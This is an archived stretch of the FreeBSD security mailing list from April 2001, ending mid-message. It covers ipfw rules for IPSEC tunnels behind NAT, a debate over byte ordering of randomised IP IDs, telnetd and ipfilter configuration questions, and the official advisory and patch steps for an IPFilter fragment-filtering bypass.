Content-Type: text/plain; charset=us-ascii Date: Mon, 16 Apr 2001 12:14:05 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20010416112358.A13561@linnet.org>, Brian Candler writes: > > Some forms of IPSEC have fundamental problems with packet rewriting, > > which means that NAT is extremely hard to use in an IPSEC environment. > > Notably, end-to-end IPSEC modes are broken, although router-based > > tunnels can be a problem depending on whether the NAT rewriting occurs > > before or after the IPSEC headers are applied. > > > > Even without NAT, though, firewalls are a little tricky to configure > > for IPSEC packets. This is because the firewall can't see the > > protocol ports (or even the protocol, for that matter) in the packet, > > Ah, it seems I wasn't clear :-) It's actually a very simple scenario, and I > do not need IPSEC packets to be routed through the firewall at all. There > are cleartext sessions which need NAT to be able to browse the outside > Internet, and then cleartext packets which are IPSEC-tunnelled from one > private network to another, like this: > > Internet Internet > ^ . . . . . . . . . . ^ > | , IPSEC tunnel ` | > +----------+ +----------+ > | Firewall | | Firewall | > +----------+ +----------+ > | | > ---+--- ---+--- > Office1 Office2 > 10.0.1.0/24 10.0.2.0/24 > > Now, I have done a bit of experimentation and found the following. > > 1. Packets which are diverted to natd are reinjected into the ipfw ruleset > at the following rule (actually 'man 8 natd' does say this). The packets > do retain their 'in via ' tag. 'man 4 divert' documents the > mechanism which makes this possible. > > 2. Incoming IPSEC packets pass _twice_ through the ipfw rules: once in > their encapsulated form (protocol 50), and when decrypted they pass > through the whole ruleset again, retaining their 'in via ' tag. > > The second rule makes things a bit of a mess. For starters, you need two > rules to permit IPSEC traffic through, one in encrypted and one in decrypted > form: > > add 1000 allow esp from to in via fxp0 > add 1010 allow ip from 10.0.1.0/24 to 10.0.2.0/24 in via fxp0 > > Now, it seems ipfw cannot tell the difference between a packet which came > 'in via fxp0' in the clear, or 'in via fxp0' as IPSEC which was successfully > decrypted and authenticated. > > It is not clear what happens if someone spoofs a packet with a 10.0.x source > and dest address and injects it into the outside interface of the firewall; > hopefully the IPSEC policy (/require) catches this case and drops the > packet, but I would feel much happier with an explicit ipfw antispoofing > rule. I've noticed this with IP Filter as well. For applications where this is a critical issue, I use the pipsecd port, allowing me to filter on the external interface (xl0, fxp0, etc), e.g. AH and ESP, and the tun(4) interface that pipsecd is attached to, e.g. TCP, UDP, ICMP. I realise that this was discussed on this list within the past 6 months and that one the KAME developers (KAME is obviously IPv6 focused) indicated that IPv6 addressing would not allow for IPSec packets being filtered on an interface because IPv6 addresses span all interfaces. (I realise I'm not quoting this exactly, or may have even got the quote completely wrong however that's what it boils down to IPv4 users trying to use KAME IPSec). As far as solutions go, I don't have one, other than continue to use pipsecd for situations that need this kind of filtering. Just sort of thinking out loud here, would some kind of daemon (or other facility), that would attach itself to a tun(4) (or other) interface, like pipsecd does, but use the kernel's IPSec facility to encrypt and encapsulate the packets instead of its own, then inject them into the external interface be of use? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:27:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from a.mx.everquick.net (a.mx.everquick.net [216.89.137.3]) by hub.freebsd.org (Postfix) with ESMTP id D75CD37B422; Mon, 16 Apr 2001 12:27:28 -0700 (PDT) (envelope-from eddy+public+spam@noc.everquick.net) Received: from localhost (eddy@localhost) by a.mx.everquick.net (8.10.2/8.10.2) with ESMTP id f3GJO8u26443; Mon, 16 Apr 2001 19:24:08 GMT X-EverQuick-No-Abuse: Report any e-mail abuse to Date: Mon, 16 Apr 2001 19:24:07 +0000 (GMT) From: "E.B. Dreger" To: Kris Kennaway Cc: Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs In-Reply-To: <20010416121019.D10023@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Date: Mon, 16 Apr 2001 12:10:19 -0700 > From: Kris Kennaway > > I can't think of anything off the top of my head, but there was some > reason why OpenBSD made this change: > > - ip_copy->ip_id = htons(ip_randomid()); > + ip_copy->ip_id = ip_randomid(); > + HTONS(ip_copy->ip_id); > > Presumably there was some reasoning there. Niels, can you shed any > light? Without having the source in front of me, what length of value does ip_randomid() return? htons(long) != htons(short) perhaps? Eddy --------------------------------------------------------------------------- Brotsman & Dreger, Inc. EverQuick Internet / EternalCommerce Division Phone: (316) 794-8922 --------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:35:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 450AF37B42C for ; Mon, 16 Apr 2001 12:35:47 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id PAA98984; Mon, 16 Apr 2001 15:34:33 -0400 (EDT) (envelope-from wollman) Date: Mon, 16 Apr 2001 15:34:33 -0400 (EDT) From: Garrett Wollman Message-Id: <200104161934.PAA98984@khavrinen.lcs.mit.edu> To: Cy Schubert - ITSD Open Systems Group Cc: Igor Roshchin , security@FreeBSD.ORG Subject: Re: Wu-ftpd and Remote BSD ftpd glob exploit In-Reply-To: <200104161846.f3GIkL206263@cwsys.cwsent.com> References: <200104161516.LAA70850@giganda.komkon.org> <200104161846.f3GIkL206263@cwsys.cwsent.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Any application, local or remote, that uses the FreeBSD glob(3) > function would have been vulnerable prior to the correction date. wu-ftpd is not one. It has its own (4.3BSD-based) glob implementation. (I won't speak for whether it is vulnerable to analogous bugs.) -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:37:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5C5AD37B42C; Mon, 16 Apr 2001 12:37:22 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f3GJbMb51244; Mon, 16 Apr 2001 12:37:22 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Date: Mon, 16 Apr 2001 12:37:22 -0700 (PDT) Message-Id: <200104161937.f3GJbMb51244@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-01:32.ipfilter Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:32 Security Advisory FreeBSD, Inc. Topic: IPFilter may incorrectly pass packets Category: core Module: IPFilter Announced: 2001-04-16 Credits: Thomas Lopatic Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases), FreeBSD 3.5-STABLE, and 4.2-STABLE prior to the correction date. Corrected: 2001-04-07 (FreeBSD 4.2-STABLE) Vendor status: Corrected FreeBSD only: NO I. Background IPFilter is a multi-platform packet filtering package. II. Problem Description When matching a packet fragment, insufficient checks were performed to ensure the fragment is valid. In addition, the fragment cache is checked before any rules are checked. Even if all fragments are blocked with a rule, fragment cache entries can be created by packets that match currently held state information. Because of these discrepancies, certain packets may bypass filtering rules. All versions of FreeBSD prior to the correction date, including FreeBSD 3.5.1 and 4.2, contain this problem. The base system that will ship with FreeBSD 4.3 does not contain this problem since it was corrected during the beta cycle before the release. III. Impact Malicious remote users may be able to bypass filtering rules, allowing them to potentially circumvent the firewall. IPFilter is not enabled by default. If you have not enabled IPFilter, your system is not vulnerable to this problem. IV. Workaround Since fragment cache matching occurs before filtering rules checking, it is not possible to work around this problem using IPFilter rules. V. Solution [FreeBSD 3.x] Due to the age of the IPFilter package shipped with FreeBSD 3.x, it is recommended that FreeBSD 3.x systems update to IPFilter 3.4.17 using the package available from the authors website: http://coombs.anu.edu.au/~avalon/ip-filter.html [FreeBSD 4.x] One of the following: 1) Upgrade to FreeBSD 4.2-STABLE after the correction date. 2) Download the patch and detached PGP signature from the following location: The following patch applies to FreeBSD 4.1-RELEASE through 4.2-STABLE. # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/ipfilter.patch # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/ipfilter.patch.asc Verify the detached signature using your PGP utility. Issue the following commands as root: # cd /usr/src # patch -p < /path/to/patch If the system is using ipfilter as a kernel module, the module may be rebuilt and installed and ipfilter rules reloaded with the following commands: # cd /usr/src/sys/modules/ipfilter # make all install # kldunload ipl && kldload ipf && ipf -Fa -f /etc/ipf.rules Otherwise, if ipfilter is compiled into the kernel, a new kernel will need to be compiled and installed and the system will have to be rebooted for the changes to take effect. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOttI71UuHi5z0oilAQHKwwP8CfuhsJA8z78zOJCLSGWPAJSgsi9aFvP7 oVd4eKkVHgHI5hC5QTRgOGg84KncXUu7DJjlOlZ+6nVxcxdp4DED/yRTWjqc14og guP3SBAcJwH5y44ZW/VV+LlbNJue77Igkq1u3dran6TPBMdiUeRIRsj0acn6k1nc ATwy7N0Ade8= =Wujh -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:41:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 76B8837B42C for ; Mon, 16 Apr 2001 12:41:34 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 310C266E07; Mon, 16 Apr 2001 12:41:31 -0700 (PDT) Date: Mon, 16 Apr 2001 12:41:31 -0700 From: Kris Kennaway To: "H. Wade Minter" Cc: security@FreeBSD.ORG Subject: Re: Rebuilding FTPD Message-ID: <20010416124130.A11148@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="W/nzBZO5zC0uMSeA" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from minter@lunenburg.org on Mon, Apr 16, 2001 at 11:40:31AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --W/nzBZO5zC0uMSeA Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Mon, Apr 16, 2001 at 11:40:31AM -0400, H. Wade Minter wrote: > What's the procedure for rebuilding ftpd after a cvsup to fix the globbing > bug? I tried "cd /usr/src/libexec/ftpd && make install", but that didn't > work. I'm running 4-STABLE. We're planning to release the advisory tomorrow, which will explain all. It would have gone out today, but someone pointed out that there may be a remaining change needed, which jedgar is going to look at tonight. Kris --W/nzBZO5zC0uMSeA Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE620rqWry0BWjoQKURApRfAKC8FgtvJsk3SfVSGVTYfs7EjSCTUACghbpP 6jMQf9Cs/lcbzcY77T5F8MA= =GjVC -----END PGP SIGNATURE----- --W/nzBZO5zC0uMSeA-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:45:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from mx.databus.com (p101-44.acedsl.com [160.79.101.44]) by hub.freebsd.org (Postfix) with ESMTP id D10C837B43C; Mon, 16 Apr 2001 12:45:08 -0700 (PDT) (envelope-from barney@mx.databus.com) Received: (from barney@localhost) by mx.databus.com (8.11.3/8.11.3) id f3GJgoH49895; Mon, 16 Apr 2001 15:42:50 -0400 (EDT) (envelope-from barney) Date: Mon, 16 Apr 2001 15:42:49 -0400 From: Barney Wolff To: "E.B. Dreger" Cc: Kris Kennaway , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs Message-ID: <20010416154249.A49858@mx.databus.com> References: <20010416121019.D10023@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from eddy+public+spam@noc.everquick.net on Mon, Apr 16, 2001 at 07:24:07PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If ip_randomid() is an asm rather than C code, I have sometimes seen problems with an asm func calling another asm func. That was long ago and far away, but is the only reason I can think of for that change. But whether the id is random or a counter, there is no reason to htons it, as long as it's treated consistently, with externals never compared with internals. Barney Wolff > > Date: Mon, 16 Apr 2001 12:10:19 -0700 > > From: Kris Kennaway > > > > I can't think of anything off the top of my head, but there was some > > reason why OpenBSD made this change: > > > > - ip_copy->ip_id = htons(ip_randomid()); > > + ip_copy->ip_id = ip_randomid(); > > + HTONS(ip_copy->ip_id); > > > > Presumably there was some reasoning there. Niels, can you shed any > > light? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:50:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 95F5C37B42C; Mon, 16 Apr 2001 12:50:53 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 2C6FC678BB; Mon, 16 Apr 2001 12:50:53 -0700 (PDT) Date: Mon, 16 Apr 2001 12:50:53 -0700 From: Kris Kennaway To: Barney Wolff Cc: "E.B. Dreger" , Kris Kennaway , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs Message-ID: <20010416125053.A11446@xor.obsecurity.org> References: <20010416121019.D10023@xor.obsecurity.org> <20010416154249.A49858@mx.databus.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="J2SCkAp4GZ/dPZZf" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010416154249.A49858@mx.databus.com>; from barney@databus.com on Mon, Apr 16, 2001 at 03:42:49PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --J2SCkAp4GZ/dPZZf Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Apr 16, 2001 at 03:42:49PM -0400, Barney Wolff wrote: > If ip_randomid() is an asm rather than C code, I have sometimes > seen problems with an asm func calling another asm func. That > was long ago and far away, but is the only reason I can think of > for that change. >=20 > But whether the id is random or a counter, there is no reason to > htons it, as long as it's treated consistently, with externals > never compared with internals. Surely that can't work since the purpose of that field is for received packet ordering (unless I'm wrong, I'm not an IPv4 guru and only skimmed the RFC), and what's ordered in network order isn't ordered in host order. Kris --J2SCkAp4GZ/dPZZf Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6200cWry0BWjoQKURAtq2AJ0X7Nt1XcCFlr9OOcWdfNtY843/kQCdEfDR 8PfVfL5oMqwnxDN9VD0TJGk= =9ZPJ -----END PGP SIGNATURE----- --J2SCkAp4GZ/dPZZf-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:57: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 0E65137B43C for ; Mon, 16 Apr 2001 12:57:02 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id MAA31209; Mon, 16 Apr 2001 12:56:16 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda31207; Mon Apr 16 12:56:03 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3GJtvr06669; Mon, 16 Apr 2001 12:55:57 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdxj6667; Mon Apr 16 12:55:27 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3GJtQ506951; Mon, 16 Apr 2001 12:55:26 -0700 (PDT) Message-Id: <200104161955.f3GJtQ506951@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdqB6944; Mon Apr 16 12:54:54 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Roman Shterenzon Cc: Alfred Perlstein , security@FreeBSD.ORG Subject: Re: 4.3rc2: if=/etc/issue in /etc/gettytab is not respected In-reply-to: Your message of "Mon, 16 Apr 2001 18:26:28 +0300." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 16 Apr 2001 12:54:53 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I don't see what the problem is. It works for me. I verified that I am using the telnetd from src/crypto not src/libexec by comparing stripped copies of telnetd in src/crypto and src/libexec with what was installed. The src/crypto version was the one that was installed. I'm using, FreeBSD cwsys 4.3-RC FreeBSD 4.3-RC #0: Sun Apr 15 08:23:59 PDT 2001 root@:/opt/cvs-430b/src/sys/compile/CWSYS i386 Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC In message , Roman Sh terenzon writes: > > So I guess the RELEASE will be made with this bug :( > > On Tue, 3 Apr 2001, Alfred Perlstein wrote: > > > * Roman Shterenzon [010403 15:35] wrote: > > > With enough attention and code analysis, that could be made before > > > 4.3-RELEASE. There's almost two weeks left, and many people who are > > > willing to test it. Me for example :) > > > > There's basically two telnetd's in the source tree. When you > > compile and install the one from src/secure/libexec/telnetd you > > get one that doesn't respect the if= directive. It looks like > > it doesn't even respect the other settings, something to do > > with the USER environment variable. > > > > I've moved this to the security list in an effort to get this > > explained. > > > > Anyone know why this going on? > > > > Basically in "normal" (src/libexec/telnetd.c) > > this: > > if (getenv("USER")) > > hostinfo = 0; > > is false, but under "crypto" (src/crypto/telnet/telnetd/telnetd.c) > > it's true and therefore doesn't display the login info. > > > > > > -- > > -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] > > Instead of asking why a piece of software is using "1970s technology," > > start asking why software is ignoring 30 years of accumulated wisdom. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > --Roman Shterenzon, UNIX System Administrator and Consultant > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:57:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 1BE2B37B43E for ; Mon, 16 Apr 2001 12:57:37 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3GJw1Z56398 for ; Mon, 16 Apr 2001 15:58:01 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Mon, 16 Apr 2001 15:57:57 -0400 (EDT) From: Rob Simmons To: Subject: ipfilter state tables Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 The total number of states that ipfilter can keep is goverened by these two constants in src/sys/netinet/ip_state.h and /usr/src/contrib/ipfilter/ip_state.h: IPSTATE_SIZE IPSTATE_MAX They are set to 5737, and 4013 which is ok for average use, but causes problems for higher traffic firewalls. Could these two have a kernel config file knob? This would make life easier :) Robert Simmons Systems Administrator http://www.wlcg.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6207Jv8Bofna59hYRA+7JAJ0dO+b+YmGlyJ9Gk2VgcTvi/R2ljgCfa6re wg6WWa/swdM1JTCSC2XZyIw= =idMY -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:59:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 1117E37B423; Mon, 16 Apr 2001 12:59:43 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id FAA08797; Tue, 17 Apr 2001 05:58:22 +1000 (EST) From: Darren Reed Message-Id: <200104161958.FAA08797@caligula.anu.edu.au> Subject: Re: non-random IP IDs To: kris@obsecurity.org (Kris Kennaway) Date: Tue, 17 Apr 2001 05:58:22 +1000 (Australia/ACT) Cc: barney@databus.com (Barney Wolff), eddy+public+spam@noc.everquick.net (E.B. Dreger), kris@obsecurity.org (Kris Kennaway), wes@softweyr.com (Wes Peters), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org In-Reply-To: <20010416125053.A11446@xor.obsecurity.org> from "Kris Kennaway" at Apr 16, 2001 12:50:53 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Kris Kennaway, sie said: > > Surely that can't work since the purpose of that field is for received > packet ordering (unless I'm wrong, I'm not an IPv4 guru and only > skimmed the RFC), and what's ordered in network order isn't ordered in > host order. It is not used by the receiver for packet ordering, only for collection of fragments (of a larger packet). Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 13: 1:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from mx.databus.com (p101-44.acedsl.com [160.79.101.44]) by hub.freebsd.org (Postfix) with ESMTP id 8E3E437B43C; Mon, 16 Apr 2001 13:01:41 -0700 (PDT) (envelope-from barney@mx.databus.com) Received: (from barney@localhost) by mx.databus.com (8.11.3/8.11.3) id f3GK1XY49993; Mon, 16 Apr 2001 16:01:33 -0400 (EDT) (envelope-from barney) Date: Mon, 16 Apr 2001 16:01:32 -0400 From: Barney Wolff To: Kris Kennaway Cc: Barney Wolff , "E.B. Dreger" , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs Message-ID: <20010416160132.A49963@mx.databus.com> References: <20010416121019.D10023@xor.obsecurity.org> <20010416154249.A49858@mx.databus.com> <20010416125053.A11446@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20010416125053.A11446@xor.obsecurity.org>; from kris@obsecurity.org on Mon, Apr 16, 2001 at 12:50:53PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org No - the ip_id is used only to collect the fragments of a single packet - so all that counts is that each fragment has the same value, and that the value not collide with that in other packets/fragments that can be in flight at the same time. (I think you're confusing ip_id with the TCP sequence number.) Barney On Mon, Apr 16, 2001 at 12:50:53PM -0700, Kris Kennaway wrote: > On Mon, Apr 16, 2001 at 03:42:49PM -0400, Barney Wolff wrote: > > If ip_randomid() is an asm rather than C code, I have sometimes > > seen problems with an asm func calling another asm func. That > > was long ago and far away, but is the only reason I can think of > > for that change. > > > > But whether the id is random or a counter, there is no reason to > > htons it, as long as it's treated consistently, with externals > > never compared with internals. > > Surely that can't work since the purpose of that field is for received > packet ordering (unless I'm wrong, I'm not an IPv4 guru and only > skimmed the RFC), and what's ordered in network order isn't ordered in > host order. > > Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 13: 3: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 1DC4037B42C; Mon, 16 Apr 2001 13:02:59 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id GAA09062; Tue, 17 Apr 2001 06:02:42 +1000 (EST) From: Darren Reed Message-Id: <200104162002.GAA09062@caligula.anu.edu.au> Subject: Re: non-random IP IDs To: kris@obsecurity.org (Kris Kennaway) Date: Tue, 17 Apr 2001 06:02:42 +1000 (Australia/ACT) Cc: avalon@coombs.anu.edu.au (Darren Reed), kris@obsecurity.org (Kris Kennaway), silby@silby.com (Mike Silbersack), newsletter@marktroberts.com (Mark T Roberts), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG In-Reply-To: <20010416120630.C10023@xor.obsecurity.org> from "Kris Kennaway" at Apr 16, 2001 12:06:30 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Kris Kennaway, sie said: > > > --TYecfFk8j8mZq+dy > Content-Type: text/plain; charset=us-ascii > Content-Disposition: inline > > On Tue, Apr 17, 2001 at 04:36:15AM +1000, Darren Reed wrote: > > > You should optimize it for mod being 2^n-1 (or make that a requirement). > > I'm afraid I don't have time to look at this right now. Perhaps it > can be revisited (the sysctl defaults to off for now), or Niels Provos > may be interested in the idea. Basically it means '% mod' -> '& mod' and call it with a 2^n-1 number. > > Also, drop the HTONS statements, they no longer make sense. Before ip_id > > was a counter and so it made sense (sorta) to change its byte ordering to > > network. Now it's just a random number so there is no longer any need. > > Well, it still has wrapping properties like a network-order counter, > i.e. the algorithm attempts to order the output so that it doesn't > wrap within the segment lifetime. That would be lost without using > HTONS. You're confusing properties of the local number and some opaque bits in a packet being sent over the 'net. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 13: 4:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id A1E1537B423; Mon, 16 Apr 2001 13:04:29 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id CE7DE678B8; Mon, 16 Apr 2001 13:04:28 -0700 (PDT) Date: Mon, 16 Apr 2001 13:04:28 -0700 From: Kris Kennaway To: Darren Reed Cc: Kris Kennaway , Barney Wolff , "E.B. Dreger" , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs Message-ID: <20010416130428.A11906@xor.obsecurity.org> References: <20010416125053.A11446@xor.obsecurity.org> <200104161958.FAA08797@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="82I3+IH0IqGh5yIs" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104161958.FAA08797@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Tue, Apr 17, 2001 at 05:58:22AM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --82I3+IH0IqGh5yIs Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Apr 17, 2001 at 05:58:22AM +1000, Darren Reed wrote: > In some mail from Kris Kennaway, sie said: > >=20 > > Surely that can't work since the purpose of that field is for received > > packet ordering (unless I'm wrong, I'm not an IPv4 guru and only > > skimmed the RFC), and what's ordered in network order isn't ordered in > > host order. >=20 > It is not used by the receiver for packet ordering, only for 